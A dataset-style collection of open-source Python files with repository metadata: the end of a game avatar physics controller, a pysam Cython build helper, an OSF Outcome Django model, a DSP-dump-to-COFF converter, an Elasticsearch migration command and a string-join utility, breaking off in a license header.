self.avatarNodePath.getPosDelta(render).pPrintValues())
#onScreenDebug.add("posDelta3",
# render.getRelativeVector(
# self.avatarNodePath,
# self.avatarNodePath.getPosDelta(render)).pPrintValues())
#onScreenDebug.add("gravity",
# self.gravity.getLocalVector().pPrintValues())
#onScreenDebug.add("priorParent",
# self.priorParent.getLocalVector().pPrintValues())
#onScreenDebug.add("avatarViscosity",
# "% 10.4f"%(self.avatarViscosity.getCoef(),))
#
#onScreenDebug.add("physObject pos",
# physObject.getPosition().pPrintValues())
#onScreenDebug.add("physObject hpr",
# physObject.getOrientation().getHpr().pPrintValues())
#onScreenDebug.add("physObject orien",
# physObject.getOrientation().pPrintValues())
onScreenDebug.add("physObject vel",
physObject.getVelocity().pPrintValues())
onScreenDebug.add("physObject len",
"% 10.4f"%physObject.getVelocity().length())
#onScreenDebug.add("posDelta4",
# self.priorParentNp.getRelativeVector(
# render,
# self.avatarNodePath.getPosDelta(render)).pPrintValues())
onScreenDebug.add("priorParent",
self.priorParent.getLocalVector().pPrintValues())
#onScreenDebug.add("priorParent po",
# self.priorParent.getVector(physObject).pPrintValues())
#onScreenDebug.add("__posDelta",
# self.__oldPosDelta.pPrintValues())
onScreenDebug.add("contact",
contact.pPrintValues())
#onScreenDebug.add("airborneHeight", "% 10.4f"%(
# self.getAirborneHeight(),))
#onScreenDebug.add("__oldContact",
# contact.pPrintValues())
#onScreenDebug.add("__oldAirborneHeight", "% 10.4f"%(
# self.getAirborneHeight(),))
airborneHeight = self.getAirborneHeight()
if airborneHeight > self.highMark:
self.highMark = airborneHeight
if __debug__:
onScreenDebug.add("highMark", "% 10.4f"%(self.highMark,))
#if airborneHeight < 0.1: #contact!=Vec3.zero():
if (airborneHeight > self.avatarRadius*0.5
or physObject.getVelocity().getZ() > 0.0
): # Check stair angles before changing this.
# ...the avatar is airborne (maybe a lot or a tiny amount).
self.isAirborne = 1
else:
# ...the avatar is very close to the ground (close enough to be
# considered on the ground).
if self.isAirborne and physObject.getVelocity().getZ() <= 0.0:
# ...the avatar has landed.
contactLength = contact.length()
if contactLength>self.__hardLandingForce:
#print "jumpHardLand"
messenger.send("jumpHardLand")
else:
#print "jumpLand"
messenger.send("jumpLand")
self.priorParent.setVector(Vec3.zero())
self.isAirborne = 0
elif jump:
#print "jump"
#self.__jumpButton = 0
messenger.send("jumpStart")
## ...jump away from walls and with with the slope normal.
#jumpVec=Vec3(contact+Vec3.up())
##jumpVec=Vec3(rotAvatarToPhys.xform(jumpVec))
#jumpVec.normalize()
# ...jump straight up, even if next to a wall.
jumpVec=Vec3.up()
jumpVec *= self.avatarControlJumpForce
physObject.addImpulse(Vec3(jumpVec))
self.isAirborne = 1 # Avoid double impulse before fully airborne.
else:
self.isAirborne = 0
if __debug__:
onScreenDebug.add("isAirborne", "%d"%(self.isAirborne,))
if contact != self.__oldContact:
# We must copy the vector to preserve it:
self.__oldContact = Vec3(contact)
self.__oldAirborneHeight = airborneHeight
moveToGround = Vec3.zero()
if not self.useHeightRay or self.isAirborne:
# ...the airborne check is a hack to stop sliding.
self.phys.doPhysics(dt)
if __debug__:
onScreenDebug.add("phys", "on")
else:
physObject.setVelocity(Vec3.zero())
#if airborneHeight>0.001 and contact==Vec3.zero():
# moveToGround = Vec3(0.0, 0.0, -airborneHeight)
#moveToGround = Vec3(0.0, 0.0, -airborneHeight)
moveToGround = Vec3(0.0, 0.0, -self.determineHeight())
if __debug__:
onScreenDebug.add("phys", "off")
# Check to see if we're moving at all:
if self.__speed or self.__slideSpeed or self.__rotationSpeed or moveToGround!=Vec3.zero():
distance = dt * self.__speed
slideDistance = dt * self.__slideSpeed
rotation = dt * self.__rotationSpeed
#debugTempH=self.avatarNodePath.getH()
assert self.avatarNodePath.getQuat().isSameDirection(physObject.getOrientation())
assert self.avatarNodePath.getPos().almostEqual(physObject.getPosition(), 0.0001)
# update pos:
# Take a step in the direction of our previous heading.
self.__vel=Vec3(
Vec3.forward() * distance +
Vec3.right() * slideDistance)
# rotMat is the rotation matrix corresponding to
# our previous heading.
rotMat=Mat3.rotateMatNormaxis(self.avatarNodePath.getH(), Vec3.up())
step=rotMat.xform(self.__vel)
physObject.setPosition(Point3(
physObject.getPosition()+step+moveToGround))
# update hpr:
o=physObject.getOrientation()
r=LRotationf()
r.setHpr(Vec3(rotation, 0.0, 0.0))
physObject.setOrientation(o*r)
# sync the change:
self.actorNode.updateTransform()
assert self.avatarNodePath.getQuat().isSameDirection(physObject.getOrientation())
assert self.avatarNodePath.getPos().almostEqual(physObject.getPosition(), 0.0001)
#assert self.avatarNodePath.getH()==debugTempH-rotation
messenger.send("avatarMoving")
else:
self.__vel.set(0.0, 0.0, 0.0)
# Clear the contact vector so we can tell if we contact something next frame:
self.actorNode.setContactVector(Vec3.zero())
return Task.cont
def doDeltaPos(self):
assert self.debugPrint("doDeltaPos()")
self.needToDeltaPos = 1
def setPriorParentVector(self):
assert self.debugPrint("doDeltaPos()")
print("self.__oldDt %s self.__oldPosDelta %s" % (self.__oldDt, self.__oldPosDelta))
if __debug__:
onScreenDebug.add("__oldDt", "% 10.4f"%self.__oldDt)
onScreenDebug.add("self.__oldPosDelta",
self.__oldPosDelta.pPrintValues())
velocity = self.__oldPosDelta*(1/self.__oldDt)*4.0 # *4.0 is a hack
assert self.debugPrint(" __oldPosDelta=%s"%(self.__oldPosDelta,))
assert self.debugPrint(" velocity=%s"%(velocity,))
self.priorParent.setVector(Vec3(velocity))
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.add("velocity", velocity.pPrintValues())
def reset(self):
assert self.debugPrint("reset()")
self.actorNode.getPhysicsObject().resetPosition(self.avatarNodePath.getPos())
self.priorParent.setVector(Vec3.zero())
self.highMark = 0
self.actorNode.setContactVector(Vec3.zero())
if __debug__:
contact=self.actorNode.getContactVector()
onScreenDebug.add("priorParent po",
self.priorParent.getVector(self.actorNode.getPhysicsObject()).pPrintValues())
onScreenDebug.add("highMark", "% 10.4f"%(self.highMark,))
onScreenDebug.add("contact", contact.pPrintValues())
def getVelocity(self):
physObject=self.actorNode.getPhysicsObject()
return physObject.getVelocity()
def enableAvatarControls(self):
"""
Activate the arrow keys, etc.
"""
assert self.debugPrint("enableAvatarControls()")
assert self.collisionsActive
if __debug__:
#self.accept("control-f3", self.spawnTest) #*#
self.accept("f3", self.reset) # for debugging only.
taskName = "AvatarControls-%s"%(id(self),)
# remove any old
taskMgr.remove(taskName)
# spawn the new task
taskMgr.add(self.handleAvatarControls, taskName, 25)
if self.physVelocityIndicator:
taskMgr.add(self.avatarPhysicsIndicator, "AvatarControlsIndicator%s"%(id(self),), 35)
def disableAvatarControls(self):
"""
Ignore the arrow keys, etc.
"""
assert self.debugPrint("disableAvatarControls()")
taskName = "AvatarControls-%s"%(id(self),)
taskMgr.remove(taskName)
taskName = "AvatarControlsIndicator%s"%(id(self),)
taskMgr.remove(taskName)
if __debug__:
self.ignore("control-f3") #*#
self.ignore("f3")
def flushEventHandlers(self):
if hasattr(self, 'cTrav'):
if self.useLifter:
self.lifter.flush() # not currently defined or needed
self.pusher.flush()
if __debug__:
def setupAvatarPhysicsIndicator(self):
if self.wantDebugIndicator:
indicator = base.loader.loadModel('phase_5/models/props/dagger')
#self.walkControls.setAvatarPhysicsIndicator(indicator)
def debugPrint(self, message):
"""for debugging"""
return self.notify.debug(
str(id(self))+' '+message)
|
f534a9d5cbe984ba96b8541140a5bfec670cdb3f
|
ff477a586b946c575441b6189123ab86c175e5ae
|
/linker_tests/link_pre_489/cy_build.py
|
d741d4947a62d0aaeddf36fa7d958223c8d30ccc
|
[
"MIT"
] |
permissive
|
pysam-developers/pysam
|
5552e4903106fc253869a405f4a2c068c6bd65c5
|
0663ca85739877e5dd05c0eb2512a8bcaa515b39
|
refs/heads/master
| 2023-08-16T19:10:17.566296
| 2023-08-15T10:06:59
| 2023-08-15T12:28:29
| 16,557,526
| 678
| 332
|
MIT
| 2023-09-14T10:40:22
| 2014-02-05T20:38:10
|
C
|
UTF-8
|
Python
| false
| false
| 3,012
|
py
|
cy_build.py
|
import os
import re
import sys
try:
from Cython.Distutils import build_ext
except ImportError:
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from distutils.sysconfig import get_config_var, get_config_vars, get_python_lib, get_python_version
from pkg_resources import Distribution
if sys.platform == 'darwin':
config_vars = get_config_vars()
config_vars['LDSHARED'] = config_vars['LDSHARED'].replace('-bundle', '')
config_vars['SHLIB_EXT'] = '.so'
def is_pip_install():
if "_" in os.environ and os.environ["_"].endswith("pip"):
return True
if "pip-egg-info" in sys.argv:
return True
if re.search("/pip-.*-build/", __file__):
return True
return False
class CyExtension(Extension):
def __init__(self, *args, **kwargs):
self._init_func = kwargs.pop("init_func", None)
Extension.__init__(self, *args, **kwargs)
def extend_includes(self, includes):
self.include_dirs.extend(includes)
def extend_macros(self, macros):
self.define_macros.extend(macros)
def extend_extra_objects(self, objs):
self.extra_objects.extend(objs)
class cy_build_ext(build_ext):
def _get_egg_name(self):
ei_cmd = self.get_finalized_command("egg_info")
return Distribution(
None, None, ei_cmd.egg_name, ei_cmd.egg_version, get_python_version(),
self.distribution.has_ext_modules() and self.plat_name).egg_name()
def build_extension(self, ext):
if isinstance(ext, CyExtension) and ext._init_func:
ext._init_func(ext)
if not self.inplace:
ext.library_dirs.append(os.path.join(self.build_lib, "pysam"))
if sys.platform == 'darwin':
# The idea is to give shared libraries an install name of the form
# `@rpath/<library-name.so>`, and to set the rpath equal to
# @loader_path. This will allow Python packages to find the library
# in the expected place, while still giving enough flexibility to
# external applications to link against the library.
relative_module_path = ext.name.replace(".", os.sep) + (get_config_var('EXT_SUFFIX') or get_config_var('SO'))
library_path = os.path.join(
"@rpath", os.path.basename(relative_module_path)
)
if not ext.extra_link_args:
ext.extra_link_args = []
ext.extra_link_args += ['-dynamiclib',
'-rpath', '@loader_path',
'-Wl,-headerpad_max_install_names',
'-Wl,-install_name,%s' % library_path,
'-Wl,-x']
else:
if not ext.extra_link_args:
ext.extra_link_args = []
ext.extra_link_args += ['-Wl,-rpath,$ORIGIN']
build_ext.build_extension(self, ext)
|
a16dd10ac0a34e876ac4ffbdcea79f2a2fbff425
|
3c41443364da8b44c74dce08ef94a1acd1b66b3e
|
/osf/models/outcomes.py
|
8a6c901cb11851bcc92d991635dbbea31a522025
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-warranty-disclaimer",
"AGPL-3.0-only",
"LGPL-2.0-or-later",
"LicenseRef-scancode-proprietary-license",
"MPL-1.1",
"CPAL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"Apache-2.0"
] |
permissive
|
CenterForOpenScience/osf.io
|
71d9540be7989f7118a33e15bc4a6ce2d2492ac1
|
a3e0a0b9ddda5dd75fc8248d58f3bcdeece0323e
|
refs/heads/develop
| 2023-09-04T03:21:14.970917
| 2023-08-31T14:49:20
| 2023-08-31T14:49:20
| 10,199,599
| 683
| 390
|
Apache-2.0
| 2023-09-14T17:07:52
| 2013-05-21T15:53:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,307
|
py
|
outcomes.py
|
'''
This module defines the Outcome model and its custom manager.
Outcomes serve as a way to collect metadata about a research effort and to aggregate Identifiers
used to share data or provide context for a that research effort, along with some additional metadata
stored in the OutcomeArtifact through table.
'''
from django.db import models
from django.utils.functional import cached_property
from osf.exceptions import NoPIDError
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.mixins import EditableFieldsMixin
from osf.models.nodelog import NodeLog
from osf.utils.outcomes import ArtifactTypes, OutcomeActions
NODE_LOGS_FOR_OUTCOME_ACTION = {
OutcomeActions.ADD: NodeLog.RESOURCE_ADDED,
OutcomeActions.UPDATE: NodeLog.RESOURCE_UPDATED,
OutcomeActions.REMOVE: NodeLog.RESOURCE_REMOVED,
}
class OutcomeManager(models.Manager):
def for_registration(self, registration, identifier_type='doi', create=False, **kwargs):
registration_identifier = registration.get_identifier(category=identifier_type)
if not registration_identifier:
raise NoPIDError(f'Provided registration has no PID of type {identifier_type}')
primary_artifact = registration_identifier.artifact_metadata.filter(
artifact_type=ArtifactTypes.PRIMARY.value
).order_by('-created').first()
if primary_artifact:
return primary_artifact.outcome
elif not create:
return None
new_outcome = self.create(**kwargs)
new_outcome.copy_editable_fields(registration, include_contributors=False)
new_outcome.artifact_metadata.create(
identifier=registration_identifier,
artifact_type=ArtifactTypes.PRIMARY,
finalized=True,
)
return new_outcome
class Outcome(ObjectIDMixin, EditableFieldsMixin, BaseModel):
# The following fields are inherited from ObjectIdMixin
# _id (CharField)
# The following fields are inherited from BaseModel
# created (DateTimeField)
# modified (DateTimeField)
# The following fields inherited from EditableFieldsMixin:
# title (TextField)
# description (TextField)
# category (CharField)
# tags (Tags, M2M)
# subjects (Subjects, M2M)
# These override the fields inherited from EditableField Mixin
# This is required to avoid collisions with the related_name
affiliated_institutions = models.ManyToManyField('Institution', related_name='outcomes')
node_license = models.ForeignKey(
'NodeLicenseRecord',
related_name='outcomes',
on_delete=models.SET_NULL,
null=True,
blank=True
)
artifacts = models.ManyToManyField('osf.Identifier', through='osf.OutcomeArtifact')
objects = OutcomeManager()
@cached_property
def primary_osf_resource(self):
return self.artifact_metadata.get(artifact_type=ArtifactTypes.PRIMARY).identifier.referent
def artifact_updated(self, action, artifact, api_request, **log_params):
nodelog_params = {'artifact_id': artifact._id, **log_params}
self.primary_osf_resource.related_resource_updated(
log_action=NODE_LOGS_FOR_OUTCOME_ACTION.get(action),
api_request=api_request,
**nodelog_params,
)
|
68fb4ac65cbd817a2aac15d60b86986d69a81230
|
47582a78f9861642308b084418815a43b07249f5
|
/src/target_dsp/calypso/dump2coff.py
|
17ff9fafae6078af6fd436a8f015f668eda7a237
|
[] |
no_license
|
osmocom/osmocom-bb
|
836de24bc9ac3bd2ce6081a865be205d9378415d
|
8bbd0d173fad3708fac3207d56dd04c14912351e
|
refs/heads/master
| 2023-08-17T00:37:09.746676
| 2023-08-10T12:25:34
| 2023-08-10T12:28:06
| 6,985,130
| 260
| 134
| null | 2019-02-16T07:17:07
| 2012-12-03T16:08:08
|
C
|
UTF-8
|
Python
| false
| false
| 6,529
|
py
|
dump2coff.py
|
#!/usr/bin/env python
import re
import sys
import struct
DATA = 0
DATA = 1
class Section(object):
DATA = 0
CODE = 1
STYP_NOLOAD = 0x0002
STYP_TEXT = 0x0020
STYP_DATA = 0x0040
STYP_BSS = 0x0080
def __init__(self, name, type, start, size, data=None):
self.name = name
self.type = type
self.start = start
self.size = size
self.data = data
@property
def flags(self):
if self.type == Section.DATA:
return Section.STYP_DATA if self.data else Section.STYP_BSS
else:
return Section.STYP_TEXT if self.data else Section.STYP_NOLOAD
class CalypsoCOFF(object):
F_RELFLG = 0x0001 # Relocation information stripped from the file
F_EXEC = 0x0002 # File is executable (i.e., no unresolved external references)
F_LNNO = 0x0004 # Line numbers stripped from the file
F_LSYMS = 0x0010 # Local symbols stripped from the file
F_LITTLE = 0x0100 # Little endian
def __init__(self, data_seg_base=0x80000000):
self.sections = {}
self.data_seg_base = data_seg_base
self.ver_magic = 0x00c1
self.tgt_magic = 0x0098
self.flags = \
CalypsoCOFF.F_RELFLG | \
CalypsoCOFF.F_EXEC | \
CalypsoCOFF.F_LNNO | \
CalypsoCOFF.F_LSYMS | \
CalypsoCOFF.F_LITTLE
def _data_pack(self, d):
return ''.join(struct.pack('<H', x) for x in d)
def save(self, filename):
# Formats
HDR_FILE = '<HHlllHHH'
HDR_SECTIONS = '<8sLLllllHHHcc'
# Optional header
oh = ''
# File header
fh = struct.pack(HDR_FILE,
self.ver_magic, # unsigned short f_ver_magic; /* version magic number */
len(self.sections), # unsigned short f_nscns; /* number of section */
0, # long f_timdat; /* time and date stamp */
0, # long f_symptr; /* file ptr to symbol table */
0, # long f_nsyms; /* number entries in the sym table */
len(oh), # unsigned short f_opthdr; /* size of optional header */
self.flags, # unsigned short f_flags; /* flags */
self.tgt_magic, # unsigned short f_tgt_magic; /* target magic number */
)
# File header size + #sections * sizeof(section header)
dptr = struct.calcsize(HDR_FILE) + len(oh) + len(self.sections) * struct.calcsize(HDR_SECTIONS)
# Section headers
sh = []
sd = []
sk = lambda x: self.data_seg_base + x.start if x.type==Section.DATA else x.start
for s in sorted(self.sections.values(), key=sk):
# Values
if s.type == Section.DATA:
mp = 0x80
sa = s.start
else:
mp = 0
sa = s.start
sptr = dptr if s.data else 0
# Header
sh.append(struct.pack(HDR_SECTIONS,
s.name, # char[8] s_name; /* 8-character null padded section name */
sa, # long int s_paddr; /* Physical address of section */
sa, # long int s_vaddr; /* Virtual address of section */
s.size, # long int s_size; /* Section size in bytes */
sptr, # long int s_scnptr; /* File pointer to raw data */
0, # long int s_relptr; /* File pointer to relocation entries */
0, # long int s_lnnoptr;/* File pointer to line number entries */
0, # unsigned short s_nreloc; /* Number of relocation entries */
0, # unsigned short s_nlnno; /* Number of line number entries */
s.flags,# unsigned short s_flags; /* Flags (see ``Section header flags'') */
'\x00', # /
chr(mp),# char s_mempage;/* Memory page number */
))
# Data
if s.data:
sd.append(self._data_pack(s.data))
dptr += s.size * 2
# Write the thing
f = open(filename, 'wb')
f.write(fh)
f.write(oh)
f.write(''.join(sh))
f.write(''.join(sd))
f.close()
def add_section(self, name, type, addr, size, data=None):
self.sections[name] = Section(name, type, addr, size, data=data)
# ----------------------------------------------------------------------------
# Dump loading
# ----------------------------------------------------------------------------
RE_DUMP_HDR = re.compile(
r"^DSP dump: (\w*) \[([0-9a-fA-F]{5})-([0-9a-fA-F]{5})\]$"
)
def _file_strip_gen(f):
while True:
l = f.readline()
if not l:
return
yield l.strip()
def dump_load_section(fg, sa, ea):
data = []
ca = sa
for l in fg:
if not l:
break
ra = int(l[0:5], 16)
if ra != ca:
raise ValueError('Invalid dump address %05x != %05x', ra, ca)
v = l[8:].split()
if len(v) != 16:
raise ValueError('Invalid dump format')
v = [int(x,16) for x in v]
data.extend(v)
ca += 0x10
if ca != ea:
raise ValueError('Missing dump data %05x != %05x', ra, ea)
return data
def dump_load(filename):
# Open file
f = open(filename, 'r')
fg = _file_strip_gen(f)
# Scan line by line for a dump header line
sections = []
for l in fg:
m = RE_DUMP_HDR.match(l)
if not m:
continue
name = m.group(1)
sa = int(m.group(2), 16)
ea = int(m.group(3), 16) + 1
sections.append((
name, sa, ea,
dump_load_section(fg, sa, ea),
))
# Done
f.close()
return sections
# ----------------------------------------------------------------------------
# Main
# ----------------------------------------------------------------------------
def main(pname, dump_filename, out_filename):
# Section to place in the COFF
sections = [
# name type start size
('.regs', Section.DATA, 0x00000, 0x0060),
('.scratch', Section.DATA, 0x00060, 0x0020),
('.drom', Section.DATA, 0x09000, 0x5000),
('.pdrom', Section.CODE, 0x0e000, 0x2000),
('.prom0', Section.CODE, 0x07000, 0x7000),
('.prom1', Section.CODE, 0x18000, 0x8000),
('.prom2', Section.CODE, 0x28000, 0x8000),
('.prom3', Section.CODE, 0x38000, 0x2000),
('.daram0', Section.DATA, 0x00080, 0x0780),
('.api', Section.DATA, 0x00800, 0x2000),
('.daram1', Section.DATA, 0x02800, 0x4800),
]
# COFF name -> dump name
dump_mapping = {
# '.regs' : 'Registers',
'.drom' : 'DROM',
'.pdrom' : 'PDROM',
'.prom0' : 'PROM0',
'.prom1' : 'PROM1',
'.prom2' : 'PROM2',
'.prom3' : 'PROM3',
}
# Load the dump
dump_sections = dict([(s[0], s) for s in dump_load(dump_filename)])
# Create the COFF
coff = CalypsoCOFF()
# Add each section (with data if we have some)
for name, type, start, size in sections:
# Dumped data ?
d_data = None
if (name in dump_mapping) and (dump_mapping[name] in dump_sections):
d_name, d_sa, d_ea, d_data = dump_sections[dump_mapping[name]]
# Add sections
coff.add_section(name, type, start, size, d_data)
# Save result
coff.save(out_filename)
return 0
if __name__ == '__main__':
sys.exit(main(*sys.argv))
|
a7eb2c52f6ee581a4b20b005a69103577fcfe6cc
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/apps/es/management/commands/make_elastic_migration.py
|
0e5da237b075093cfa52f49d9a36ba304b1178c7
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 9,856
|
py
|
make_elastic_migration.py
|
from argparse import ArgumentTypeError
from datetime import datetime
from django.core.management.base import CommandError
from django.db.migrations import Migration
from corehq.apps.es.migration_operations import (
CreateIndex,
DeleteIndex,
UpdateIndexMapping,
)
from corehq.apps.es.transient_util import (
iter_index_cnames,
doc_adapter_from_cname,
)
from hqscripts.management.commands import makemigrations
class Command(makemigrations.Command):
DJANGO_APP_LABEL = "es"
help = "Creates a new migration for modifying Elasticsearch index(es)."
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument(
"-c", "--create", metavar="CNAME[:NEW_INDEX_NAME]", dest="creates",
default=[], type=self.adapter_and_name_type, action="append", help=(
"Add a CreateIndex operation for index with canonical name "
"CNAME. Use the optional ':NEW_INDEX_NAME' suffix to specify "
"a name to use for the new index. The -c/--create option may "
"be specified multiple times."
),
)
parser.add_argument(
"-u", "--update", metavar="CNAME[:PROPERTY[,PROPERTY ...]]",
dest="updates", default=[], type=self.adapter_and_properties_type,
action="append", help=(
"Add an UpdateIndexMapping operation for index with canonical "
"name CNAME. Use the optional ':PROPERTY,...' suffix to "
"specify which properties to update, omitting this suffix will "
"update all properties. The -u/--update option may be "
"specified multiple times."
),
)
parser.add_argument(
"-d", "--delete", metavar="INDEX", dest="deletes", default=[],
action="append", help=(
"Add a DeleteIndex operation for the index with exact name "
"%(metavar)s. The -d/--delete option may be specified multiple "
"times."
),
)
def handle(self, creates, updates, deletes, **options):
# CLI argument values explicitly required by this custom handler
self.empty = options["empty"]
# self.migration_name is also required by 'write_migration_files()'
self.migration_name = options["name"]
# abort early if a migration name is provided but is invalid
if self.migration_name and not self.migration_name.isidentifier():
raise CommandError("The migration name must be a valid Python identifier.")
# create the new migration object and its Elastic migration operations
migration = self.build_migration(creates, updates, deletes)
# perform makemigrations boilerplate to build the changes collection
changes = self.arrange_migration_changes(migration)
# CLI argument values that are only required for the super class(es)
# 'write_migration_files()' method to work nominally.
self.dry_run = options["dry_run"]
self.verbosity = options["verbosity"]
self.include_header = options["include_header"]
self.lock_path = options["lock_path"]
# write the new migration file
self.write_migration_files(changes)
def build_migration(self, creates, updates, deletes):
"""Returns a Migration instance with an operations list for each of the
provided operation collections.
:param creates: a list of ``(document_adapter, new_name)`` tuples
:param updates: a list of ``(document_adapter, properties_dict)`` tuples
:param deletes: a list of index names
:returns: a Migration instance
"""
migration = Migration("custom", self.DJANGO_APP_LABEL)
if not self.empty:
def verify_and_append_migration_operation(operation):
"""Ensure there are not multiple operations for the same index
and append the operation to the migration."""
default_op = ops_by_index_name.setdefault(operation.name, operation)
if default_op is not operation:
raise CommandError("\n - ".join([
f"Multiple operations for the same index ({operation.name}):",
repr(default_op),
repr(operation),
]))
migration.operations.append(operation)
ops_by_index_name = {}
# build 'create' operations
for adapter, new_name in creates:
verify_and_append_migration_operation(CreateIndex(
new_name,
adapter.type,
adapter.mapping,
adapter.analysis,
adapter.settings_key,
))
# build 'update' operations
for adapter, properties in updates:
verify_and_append_migration_operation(UpdateIndexMapping(
adapter.index_name,
adapter.type,
properties=properties,
))
# build 'delete' operations
for index_name in deletes:
verify_and_append_migration_operation(DeleteIndex(index_name))
return migration
def arrange_migration_changes(self, migration):
"""Performs the 'makemigrations' boilerplate responsible for building
the 'changes' collection with the next migration number, auto migration
name detection, etc.
:param migration: a Migration instance
:returns: changes dict
"""
from django.apps import apps
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.questioner import NonInteractiveMigrationQuestioner
from django.db.migrations.state import ProjectState
loader = MigrationLoader(None)
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
NonInteractiveMigrationQuestioner(specified_apps=[migration.app_label]),
)
return autodetector.arrange_for_graph(
changes={migration.app_label: [migration]},
graph=loader.graph,
migration_name=self.migration_name,
)
@staticmethod
def adapter_type(value):
"""Returns a document adapter for the provided index canonical name
supplied as the ``CNAME`` portion of the ``--create`` and ``--update``
argument values.
:param value: canonical name of the index.
:raises: ``argparse.ArgumentTypeError`` if ``value`` is not a valid
canonical name.
"""
try:
return doc_adapter_from_cname(value)
except KeyError:
raise ArgumentTypeError(
f"Invalid index canonical name ({value}), "
f"choices: {sorted(iter_index_cnames())}"
)
def adapter_and_name_type(self, value):
"""Returns a tuple of ``(document_adapter, new_index_name)`` for the
provided ``--create`` argument value whose format is
``CNAME[:NEW_INDEX_NAME]`` where ``CNAME`` is a valid index canonical
name and (optional) ``NEW_INDEX_NAME`` is the name to use for the new
index.
If the new name syntax (``:NEW_INDEX_NAME``) is omitted, an automatic
new name is returned, derived from the index canonical name and today's
date.
:param value: the value of a ``--create`` argument
:raises: ``argparse.ArgumentTypeError`` if ``value`` uses invalid syntax
or refers to an invalid index canonical name or property name.
"""
cname, delim, new_name = value.partition(":")
adapter = self.adapter_type(cname)
if not delim:
new_name = f"{cname.replace('_', '-')}-{datetime.utcnow():%Y%m%d}"
elif not new_name:
raise ArgumentTypeError(
f"Invalid (empty) new name for create action: {value!r}"
)
return adapter, new_name
def adapter_and_properties_type(self, value):
"""Returns a tuple of ``(document_adapter, properties_dict)`` for the
provided ``--update`` argument value whose format is
``CNAME[:PROPERTY[,PROPERTY ...]]`` where ``CNAME`` is a valid index
canonical name and (optional) ``PROPERTY`` is/are valid property name(s)
in the specified index's mapping.
If the property list syntax (``:PROPERTY...``) is omitted, all
properties for the index are returned.
:param value: the value of an ``--update`` argument
:raises: ``argparse.ArgumentTypeError`` if ``value`` uses invalid syntax
or refers to an invalid index canonical name or property name.
"""
cname, delim, property_names = value.partition(":")
adapter = self.adapter_type(cname)
properties = all_properties = adapter.mapping["properties"]
if delim:
properties = {}
for name in property_names.split(","):
if not name:
continue
try:
properties[name] = all_properties[name]
except KeyError:
raise ArgumentTypeError(
f"Invalid property name for index: {cname} (got "
f"{name!r}, expected one of {sorted(all_properties)})"
)
if not properties:
raise ArgumentTypeError(
f"Invalid (empty) property list for update action: {value!r}"
)
return adapter, properties
|
6403fcfe8ef8a56c852fa65493f2242ccda6666c
|
f4ac42a3316e8815cdd307fbe11229438d0cb951
|
/Kernels/Research/FFT/config/strtools.py
|
a1ce449077fa0e759098c96ebb247921c16ad86f
|
[
"Apache-2.0"
] |
permissive
|
ARM-software/EndpointAI
|
6879c160645c741d217421050cc824bb06eb6471
|
b18e7ddc6e14229a724f2d7ae1f6c721013cbb68
|
refs/heads/master
| 2023-07-31T22:20:37.023081
| 2023-05-18T15:25:11
| 2023-05-18T15:25:11
| 292,621,053
| 231
| 96
|
Apache-2.0
| 2021-07-31T23:18:44
| 2020-09-03T16:19:43
|
C
|
UTF-8
|
Python
| false
| false
| 900
|
py
|
strtools.py
|
#
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def joinit(iterable, delimiter):
# Intersperse a delimiter between element of a list
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def joinStr(str):
return("".join(joinit(str,",")))
|
9098f7a3e6660ace92105df9ca945810b962ad20
|
cad91ae76d2746a6c28ddda0f33a58f9d461378f
|
/PyTorch/Translation/GNMT/seq2seq/utils.py
|
2164dd39bd0cc13e73f9a3d382ff41bc7013667e
|
[
"MIT"
] |
permissive
|
NVIDIA/DeepLearningExamples
|
fe677521e7e2a16e3cb0b77e358f9aab72f8c11a
|
a5388a45f71a949639b35cc5b990bd130d2d8164
|
refs/heads/master
| 2023-08-31T20:57:08.798455
| 2023-08-23T10:09:12
| 2023-08-23T10:09:12
| 131,881,622
| 11,838
| 3,124
| null | 2023-08-28T16:57:33
| 2018-05-02T17:04:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 12,801
|
py
|
utils.py
|
# Copyright (c) 2017 Elad Hoffer
# Copyright (c) 2018-2020, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
